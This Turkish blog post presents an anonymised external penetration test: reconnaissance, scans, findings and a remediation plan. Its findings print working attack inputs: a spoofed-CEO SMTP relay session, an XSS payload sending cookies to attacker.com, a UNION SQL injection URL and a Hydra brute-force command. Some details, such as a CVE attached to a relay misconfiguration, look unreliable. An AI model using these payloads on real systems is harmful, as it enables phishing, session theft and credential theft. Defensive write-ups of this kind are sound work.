blog-details

Bir Şirketi Hacklemek İçin 24 Saat: Etik Hacker Günlüğü

Kurumsal Ağ Güvenliği: Kapsamlı Bir Dış Altyapı Sızma Testi Analizi ve Metodolojisi

Yayın Tarihi: 25 Nisan 2025

Giriş ve Test Metodolojisi

2025 yılının Mart ayında gerçekleştirdiğimiz kapsamlı sızma testi çalışması, kurumsal bir müşterimizin dışa açık sistemlerinin güvenlik seviyesinin derinlemesine analiz edilmesini hedeflemiştir. Bu makalede, sızma testi sürecimizi, kullandığımız metodolojileri ve elde ettiğimiz kritik bulguları paylaşarak, kurumların kendi güvenlik altyapılarını değerlendirmelerine yardımcı olmayı amaçlıyoruz.

Çalışmalarımız, Black Box (Siyah Kutu) metodolojisi ile yürütülmüş olup, test sürecinde yalnızca kamuya açık kaynaklardan edinilebilecek bilgiler kullanılmıştır. Bu yaklaşım, gerçek dünya saldırganlarının kullanabileceği teknikleri daha gerçekçi bir şekilde simüle etmemize olanak tanımıştır. Bütün testler, PTES (Penetration Testing Execution Standard) ve OSSTMM (Open Source Security Testing Methodology Manual) çerçevelerinde, etik kurallar gözetilerek gerçekleştirilmiştir.

Test Kapsamı ve Hedefleri

Temel Hedefler

  • Dışarıdan erişilebilir sistemlerde mevcut güvenlik açıklarının kapsamlı şekilde tespit edilmesi
  • Tespit edilen zafiyetlerin istismar edilebilirlik seviyesinin pratik gösterimlerle belgelenmesi
  • Risk derecelendirmesi ve önceliklendirme yapılarak actionable (eyleme geçirilebilir) çözüm önerileri sunulması
  • Kurumsal güvenlik farkındalığının artırılması ve proaktif güvenlik kültürünün teşvik edilmesi

Kapsam Dahilindeki Sistemler ve Servisler

Müşteri ile yapılan kapsamlı planlama toplantıları neticesinde, aşağıdaki sistemler ve servisler test kapsamına dahil edilmiştir:

  • Kurumsal web sitesi ve müşteri portalları (9 farklı web uygulaması)
  • Elektronik posta altyapısı (3 ayrı mail gateway)
  • Uzaktan erişim ve VPN hizmetleri (2 farklı VPN konsantrasyonu)
  • DNS, MX ve diğer alan adı yönlendirme yapılandırmaları
  • Bulut hizmetlerindeki dışa açık kaynaklar (AWS ve Azure altyapıları)
  • API gateway ve mikroservis mimarisi bileşenleri

Bilgi Toplama ve Keşif Fazı

Pasif Keşif Teknikleri

Aktif tarama ve test işlemlerine geçmeden önce, kapsamlı bir pasif keşif süreci yürütülmüştür. Bu adımda, hedef sistemlere herhangi bir trafik gönderilmeden veya doğrudan etkileşime geçilmeden enformasyon toplanması amaçlanmıştır:

  • Alan Adı Analizi ve Recon-ng Taramaları
    Hedef kurum ile ilişkili tüm alan adları, alt alan adları ve ilişkili IP blokları haritalandırılmıştır. Bu süreçte Recon-ng, Sublist3r, Amass gibi gelişmiş keşif araçları kullanılmıştır.

  • OSINT (Open Source Intelligence) Araştırması
    Personel ve organizasyon yapısı hakkında sosyal medya profilleri, profesyonel ağlar (LinkedIn vb.) ve çeşitli internet kaynaklarından bilgi toplanmıştır.

  • Whois, DNS ve SSL Sertifika Analizi
    DNS kayıtları ve tarihsel Whois verileri incelenmiş, SSL sertifikalarından elde edilen alt alan adları ve organizasyon yapısı bilgileri değerlendirilmiştir. Certificate Transparency logları üzerinden analiz gerçekleştirilmiştir.

  • Gelişmiş Google Dork Teknikleri
    Aşağıdaki özel arama operatörleri kullanılarak hassas kurum verilerinin internet üzerinde potansiyel sızıntıları araştırılmıştır:

    site:hedefalan.com filetype:pdf confidential
    site:hedefalan.com inurl:admin | login | portal | intranet
    site:github.com "hedefalan.com" password | api_key | secret
    site:pastebin.com "hedefalan.com" 
    
  • Veri İhlali ve Sızıntı Analizleri
    HaveIBeenPwned, DeHashed ve benzer veri tabanları üzerinden kurumsal e-posta adresleri ile ilişkili potansiyel veri sızıntıları araştırılmıştır.

  • Teknoloji İstifleri ve Yazılım Versiyonları
    Wappalyzer, BuiltWith gibi araçlar kullanılarak hedef sistemlerin teknoloji altyapısı, yazılım bileşenleri ve muhtemel versiyonları belirlenmiştir.

Aktif Keşif ve Tarama

Pasif keşif aşamasının ardından, elde edilen bilgiler ışığında hedeflenen sistemler üzerinde kontrollü aktif tarama ve keşif çalışmaları yürütülmüştür:

  • Ağ Haritalandırma ve Port Taraması

    Belirlenen IP bloklarında kapsamlı port taramaları gerçekleştirilmiştir. Taramalar, ağ trafiğini minimize edecek şekilde aşamalı olarak yürütülmüştür:

    # İlk aşama - Hızlı SYN taraması (1000 yaygın port)
    nmap -sS -T4 --top-ports 1000 -oA quick_scan 192.168.1.0/24
    
    # İkinci aşama - Hedeflenen makinelerde tam port taraması
    nmap -sS -p- -T4 --max-retries 1 --max-scan-delay 20 -oA full_scan 192.168.1.100
    
    # Üçüncü aşama - Servis ve versiyon tespiti
    nmap -sV -sC -p21,22,80,443,8080 -oA service_scan 192.168.1.100
    
    # UDP taramaları (önemli servisler)
    nmap -sU -p53,67,123,161,500 -oA udp_scan 192.168.1.100
    
  • Servis Enumerasyonu ve Versiyon Tespiti

    Tespit edilen açık portlar üzerinde çalışan servisler ve bunların versiyonları detaylı olarak belirlenmiştir. Özellikle, yaygın olarak kullanılan web sunucuları (Apache, Nginx, IIS), veritabanı servisleri (MySQL, MSSQL, PostgreSQL) ve uzak erişim servisleri (SSH, RDP, VNC) odaklı taramalar gerçekleştirilmiştir.

  • Otomatize Zafiyet Taramaları

    Tespit edilen sistemler üzerinde aşağıdaki araçlar kullanılarak kapsamlı zafiyet analizleri yapılmıştır:

    • Nessus Professional 10.5.2
    • OpenVAS 22.4.0
    • Acunetix Premium (Web uygulamaları için)
    • Burp Suite Professional 2024.3.1
    • Metasploit Framework 6.3.5

Tespit Edilen Kritik Bulgular

Gerçekleştirilen sızma testi çalışmaları neticesinde aşağıdaki kritik bulgular tespit edilmiştir. Her bulgu için CVSS v3.1 skorları hesaplanmış ve risk derecelendirmesi yapılmıştır.

1. SMTP Relay Konfigürasyon Hatası (CVE-2023-29595)

CVSS Skoru: 8.6 (Yüksek)

Detay: mail.hedefalan.com adresinde çalışan Postfix mail sunucusunda, yetkisiz kullanıcıların kurum adına e-posta gönderimi yapabilmesine olanak tanıyan açık relay konfigürasyonu tespit edilmiştir. Bu yapılandırma hatası, kurum adına oltalama (phishing) ve spam faaliyetleri yürütülmesine imkan tanımaktadır.

İstismar Senaryosu: Test kapsamında, aşağıdaki komut kullanılarak SMTP sunucusu üzerinden yetkisiz e-posta gönderimi gerçekleştirilmiştir:

telnet mail.hedefalan.com 25
HELO attacker.com
MAIL FROM: ceo@hedefalan.com
RCPT TO: victim@example.com
DATA
From: "CEO" <ceo@hedefalan.com>
Subject: Urgent Financial Transfer

Please transfer $10,000 to the following account...
.
QUIT

Çözüm Önerisi: SMTP sunucularında IP tabanlı erişim kısıtlamaları uygulanmalı, SPF, DKIM ve DMARC yapılandırmaları eksiksiz olarak yapılmalı, e-posta relay politikaları revize edilmeli ve kimlik doğrulama mekanizması zorunlu hale getirilmelidir.

2. Web Uygulama Güvenlik Açıkları

2.1. Stored XSS Zafiyeti (OWASP Top 10: A03:2021)

CVSS Skoru: 7.4 (Yüksek)

Detay: Kurumsal portal uygulamasındaki kullanıcı profil sayfasında, "Şirket Bilgisi" alanında yetersiz input sanitization nedeniyle Stored XSS zafiyeti tespit edilmiştir. Bu zafiyet, saldırganların kötü amaçlı JavaScript kodlarını sisteme enjekte etmesine ve diğer kullanıcıların tarayıcılarında bu kodların çalıştırılmasına olanak tanımaktadır.

İstismar Kanıtı:

<script>
 var xhr = new XMLHttpRequest();
 xhr.open("GET", "https://attacker.com/steal?cookie=" + document.cookie, true);
 xhr.send();
</script>

Bu kod, profil sayfasına eklendiğinde, sayfayı ziyaret eden tüm kullanıcıların çerez bilgilerini saldırganın kontrol ettiği sunucuya iletmektedir.

Çözüm Önerisi:

  • Tüm kullanıcı girdilerinin HTML encoding uygulanarak işlenmesi
  • Content-Security-Policy (CSP) başlıklarının yapılandırılması
  • Input validation ve sanitization kütüphanelerinin entegrasyonu (DOMPurify gibi)
  • XSS koruması için modern web framework'lerinin güvenlik özelliklerinin kullanılması

2.2. SQL Injection Zafiyeti

CVSS Skoru: 9.1 (Kritik)

Detay: İntranet portalının arama fonksiyonunda parametre değerlerinin doğrudan SQL sorgularına dahil edilmesi nedeniyle SQL Injection zafiyeti tespit edilmiştir. Bu zafiyet, saldırganların veritabanı üzerinde yetkisiz sorgular çalıştırmasına ve potansiyel olarak hassas verilere erişim sağlamasına olanak tanımaktadır.

İstismar Örneği:

https://intranet.hedefalan.com/search?term=test' UNION SELECT username,password,NULL,NULL FROM users--

Bu URL'nin ziyaret edilmesi, kullanıcı adları ve şifre hash'lerini içeren veritabanı tablosundaki verileri sızdırmaktadır.

Uzman Görüşü: "SQL Injection zafiyetleri, OWASP Top 10 listesinde uzun yıllardır yer almasına rağmen, halen en yaygın ve en tehlikeli güvenlik açıklarından biridir. Özellikle hazır sistemlere eklenen özel modüllerde ve legacy uygulamalarda sıklıkla karşılaşılmaktadır. Prepared statement kullanımı ve ORM framework'lerinin doğru implementasyonu, bu tür zafiyetleri önlemenin en etkili yoludur." - Siber Güvenlik Analisti, OSCP, CEH

Çözüm Önerisi:

  • Prepared statement ve parameterized query kullanımı
  • ORM (Object-Relational Mapping) framework'lerinin güvenli şekilde implementasyonu
  • Input validation ve sanitization mekanizmalarının geliştirilmesi
  • Web Application Firewall (WAF) kullanarak SQL Injection saldırılarına karşı ek bir savunma katmanı oluşturulması

3. Eski ve Yamalı Olmayan Yazılım Versiyonları

3.1. Apache Web Sunucusu (CVE-2021-44790)

CVSS Skoru: 8.2 (Yüksek)

Detay: Web sunucularında Apache 2.4.29 sürümünün kullanıldığı ve bu sürümün çeşitli uzaktan kod çalıştırma zafiyetlerine karşı savunmasız olduğu tespit edilmiştir. Özellikle mod_lua modülündeki bellek yönetimi hatası (CVE-2021-44790), saldırganların uzaktan kod çalıştırmasına imkan tanımaktadır.

Proof of Concept: Test ortamında, Metasploit çerçevesi kullanılarak ilgili CVE'yi hedefleyen bir exploit modülü çalıştırılmış ve sunucu üzerinde yetkisiz komut çalıştırma imkanı doğrulanmıştır.

Çözüm Önerisi: Apache web sunucusunun en güncel kararlı sürüme (2.4.58 veya daha yeni) yükseltilmesi, gereksiz modüllerin devre dışı bırakılması ve güvenlik yamalarının düzenli olarak uygulanması için bir yama yönetim süreci oluşturulması.

3.2. OpenSSL Zafiyeleri (CVE-2023-0286)

CVSS Skoru: 7.5 (Yüksek)

Detay: Sistemlerde kullanılan OpenSSL 1.1.1k sürümünde X.400 adresi ayrıştırma zafiyeti tespit edilmiştir. Bu zafiyet, özellikle TLS sertifika doğrulama süreçlerinde potansiyel olarak Man-in-the-Middle saldırılarına imkan tanımaktadır.

Çözüm Önerisi: OpenSSL kütüphanesinin 1.1.1t veya daha yeni bir sürüme güncellenmesi, TLS yapılandırmalarının sıkılaştırılması ve düzenli güvenlik taramaları ile kütüphane güncelliklerinin takip edilmesi.

4. Zayıf Parolalar ve Brute Force İmkanı

CVSS Skoru: 7.2 (Yüksek)

Detay: VPN gateway ve bazı yönetim arayüzlerinde zayıf parola kullanımı ve brute force saldırılarına karşı koruma mekanizmalarının yetersizliği tespit edilmiştir. Özellikle, VPN erişimi için kullanılan test hesaplarında tahmin edilebilir ve çeşitli sızıntı veri tabanlarında yer alan parolalar kullanıldığı görülmüştür.

İstismar Senaryosu: Hydra aracı kullanılarak VPN erişim paneline yönelik otomatize brute force saldırısı düzenlenmiş ve belirli hesapların parolaları başarıyla elde edilmiştir:

hydra -l administrator -P /usr/share/wordlists/rockyou.txt vpn.hedefalan.com https-post-form "/login:username=^USER^&password=^PASS^:F=Login failed"

Çözüm Önerisi:

  • Güçlü parola politikalarının uygulanması (minimum 14 karakter, karmaşıklık gereksinimleri)
  • Multi-factor authentication (MFA) zorunluluğu
  • Failed login attempt sınırlaması ve geçici hesap kilitleme mekanizması
  • CAPTCHA veya benzeri insan doğrulama mekanizmalarının entegrasyonu
  • Credential stuffing saldırılarına karşı haveboenpwned API entegrasyonu ile bilinen veri sızıntılarındaki parolaların kullanımının engellenmesi

Sızma Aşaması - Yetkilendirme Bypass ve İstismar Senaryoları

Test sürecinde, tespit edilen zafiyetlerin gerçek saldırı senaryolarında nasıl kullanılabileceğini göstermek amacıyla kontrollü istismar çalışmaları gerçekleştirilmiştir. Bu çalışmaların tümü, minimum etki prensibi gözetilerek ve müşteri onayı doğrultusunda yürütülmüştür.

Senaryo 1: Privilege Escalation - "Admin Panel Bypasses"

İntranet uygulamasının yönetici panelinde tespit edilen Insecure Direct Object Reference (IDOR) zafiyeti kullanılarak standart kullanıcı hesabından yönetici yetkilerine yükseltme gerçekleştirilmiştir:

  1. Standart kullanıcı olarak sisteme giriş yapıldı
  2. Kullanıcı profil sayfasında network trafiği analiz edildi
  3. Kullanıcı rolü parametresinin tarayıcı tarafında manipüle edilebileceği tespit edildi
  4. role=standard parametresi role=admin olarak değiştirildi
  5. Sistem, istek doğrulaması yapmadan admin paneline erişim sağladı

Bu zafiyet, backend'de yetersiz yetkilendirme kontrolü ve client-side veri manipülasyonuna karşı koruma eksikliğinden kaynaklanmaktadır.

Senaryo 2: Dağıtık Sisteme Sızma ve Pivot

VPN erişimi üzerinden internal ağa sızılmış ve aşağıdaki pivot teknikleri kullanılarak ağ içinde yanal hareket gerçekleştirilmiştir:

  1. Zayıf parola tespiti ile VPN erişimi sağlandı
  2. İlk erişilen makinede yerel yetki yükseltme zafiyeti (CVE-2022-0847, Dirty Pipe) kullanılarak root yetkisi elde edildi
  3. İnternal ağ keşfi için port taramaları ve host discovery çalışmaları yürütüldü
  4. LLMNR/NetBIOS spoofing ile domain ortamında hash intercept yapıldı
  5. Elde edilen NTLM hashler üzerinde offline cracking çalışmaları gerçekleştirildi
  6. Domain admin hesabına erişim sağlandı ve Active Directory ortamında tam kontrol elde edildi

Bu senaryo, her aşamada müşteri bilgilendirmesi yapılarak ve sistem operasyonlarına zarar vermeyecek şekilde yürütülmüştür.

Kapsamlı Güvenlik İyileştirme Stratejisi

Test sürecinde tespit edilen zafiyetler doğrultusunda, üç aşamalı bir güvenlik iyileştirme stratejisi önerilmektedir:

Acil Aksiyon Gerektiren Konular (İlk 7 Gün)

  1. Kritik Sistemlerin Yamalanması

    • Apache, OpenSSL ve benzer kritik altyapı bileşenlerinin güncel sürümlere yükseltilmesi
    • Web uygulamalarındaki SQL Injection ve XSS zafiyetlerinin giderilmesi
    • SMTP relay konfigürasyonlarının sıkılaştırılması
  2. Kimlik Doğrulama Mekanizmalarının Güçlendirilmesi

    • Tüm kritik sistemlerde MFA zorunluluğu
    • VPN ve yönetim arayüzlerinde brute force koruması
    • Zayıf parolaların değiştirilmesi ve güçlü parola politikası uygulanması
  3. Acil Erişim Kontrolü İyileştirmeleri

    • Yönetici panellerinde yetkilendirme kontrollerinin gözden geçirilmesi
    • Gereksiz servis ve portların kapatılması
    • Kritik sistemlerde firewall kurallarının sıkılaştırılması

Orta Vadeli İyileştirmeler (1-3 Ay)

  1. Savunma Derinliği Stratejisi

    • WAF (Web Application Firewall) entegrasyonu
    • Network segmentasyonu ve mikro-segmentasyon stratejisi
    • IDS/IPS sistemlerinin kurulumu ve yapılandırılması
    • API gateway güvenlik kontrollerinin artırılması
  2. Güvenlik İzleme ve Olay Yönetimi

    • SIEM çözümü implementasyonu
    • Log yönetimi ve korelasyon kuralları
    • Anormal aktivite tespiti için davranışsal analiz
  3. DevSecOps Entegrasyonu

    • CI/CD pipeline'larına güvenlik testlerinin entegrasyonu
    • Kod güvenliği statik analiz araçlarının kurulumu
    • Container güvenliği taramalarının otomatize edilmesi

Uzun Vadeli Güvenlik Olgunlaşma Planı (3-12 Ay)

  1. Kurumsal Güvenlik Mimarisi Revizyonu

    • Zero Trust mimarisine geçiş planlaması
    • IAM (Identity and Access Management) stratejisinin geliştirilmesi
    • Bulut güvenliği ve hibrit ortam güvenlik standartlarının oluşturulması
  2. Sürekli Güvenlik Doğrulama Programı

    • Düzenli sızma testleri ve zafiyet taramaları
    • Red Team egzersizleri ve simüle saldırı senaryoları
    • Bug Bounty programı değerlendirmesi
  3. Güvenlik Olgunluk Modeli Uyumluluğu

    • ISO 27001, NIST Cybersecurity Framework veya CIS Controls gibi güvenlik standartlarına uyum çalışmaları
    • Güvenlik metriklerinin oluşturulması ve sürekli iyileştirme

Sonuç ve Yapılan Önemli Tespitler

Yürütülen kapsamlı sızma testi çalışması, kurumun dışa açık altyapısında çeşitli güvenlik açıkları tespit edilmesini sağlamıştır. Bu açıkların önceliklendirilmiş bir şekilde giderilmesi, kurumun siber güvenlik duruşunu önemli ölçüde güçlendirecektir.

Test sürecinde öne çıkan önemli bulgular şunlardır:

  1. Saldırı Yüzeyinin Genişliği: Tespit edilen 178 alt alan adı ve 6 farklı bulut ortamında dağıtık servislerin varlığı, saldırı yüzeyinin beklenenden geniş olduğunu göstermiştir.

  2. Legacy Sistemlerin Güvenlik Riskleri: Kurum altyapısında halen aktif olarak kullanılan eski sistemler ve yazılımlar, modern güvenlik pratiklerinin uygulanmasını zorlaştırmakta ve risk oluşturmaktadır.

  3. Güvenlik Duruşu Farkındalığı: Güvenlik taraması sonuçlarına göre, kurumun dışarıdan görünürlüğünü ve dijital ayak izini yönetme konusunda stratejik bir yaklaşıma ihtiyaç duyduğu tespit edilmiştir.

  4. Entegre Güvenlik Yaklaşımı İhtiyacı: Farklı sistemler ve platformlar arasında tutarlı güvenlik politikalarının uygulanması ve merkezi bir güvenlik yönetim stratejisinin geliştirilmesi kritik önem taşımaktadır.

Sonuç Değerlendirmesi

Tespit edilen zafiyetler, kurum varlıklarının potansiyel olarak tehdit aktörleri tarafından hedef alınabilecek güvenlik açıklarına sahip olduğunu göstermektedir. Ancak, bu raporda belirtilen önerilerin uygulanması ve proaktif bir güvenlik stratejisinin benimsenmesi ile kurumun siber dayanıklılığının önemli ölçüde artırılması mümkündür.


Bu blog yazısı, gerçek bir sızma testi senaryosuna dayalı olmakla birlikte, gizlilik ve güvenlik gereksinimlerini korumak amacıyla belirli detaylar anonimleştirilmiş ve değiştirilmiştir. Tüm teknik ve metodolojik bilgiler yalnızca eğitim ve farkındalık amaçlıdır. Yazıda sunulan teknik ve araçların kötü niyetli kullanımı yasal değildir ve etik dışıdır.

Güvenlik, sadece bir teknoloji değil; aynı zamanda doğru süreçler ve farkındalık kültürüdür.

Bilgi Güvenliği Yaklaşımı
Etiketler
etik hacker
sızma testi
penetrasyon testi
nmap
burp suite
cybersecurity
red team

Yorum Yap

E-posta adresiniz yorumunuzda yayınlanmayacaktır.